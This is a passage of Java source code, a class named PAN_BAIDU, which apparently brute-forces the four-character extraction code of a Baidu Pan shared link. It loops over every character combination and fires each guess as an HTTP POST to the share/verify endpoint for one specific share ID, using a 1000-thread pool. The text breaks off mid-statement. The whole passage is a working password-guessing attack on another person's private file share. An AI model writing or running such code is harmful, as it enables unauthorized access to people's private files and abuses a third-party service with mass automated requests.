class PAN_BAIDU {
public void execute() throws InterruptedException {
ExecutorService es = Executors.newFixedThreadPool(1000);
Map<String,BufferedWriter> WMAP = new HashMap<>(CODES_ALL.length+5,1f);
for (char c1 : CODES_ALL) {
for (char c2 : CODES_ALL) {
for (char c3 : CODES_ALL) {
for (char c4 : CODES_ALL) {
es.execute(()->{
String pwd = "" + c1 + c2 + c3 + c4;
String href = "https://pan.baidu.com/share/verify?web=5&app_id=250528"
+ "&logid=MTYxMzYxMjQxNzAzOTAuNDkxMDc2MDQ2Njc0ODg0"
+ "&channel=chunlei"
+ "&clienttype=5"
+ "&surl=v1gyxFpfuFC0EIMilT3tpg"
+ "&t=" + System.currentTimeMillis()
+ "&linksource="
+ "&csign=9314e3721b5dc3557ec21065ad483b83";
HttpPost post = new HttpPost(href);
post.setHeader("Accept", "application/json, text/plain, */*");
post.setH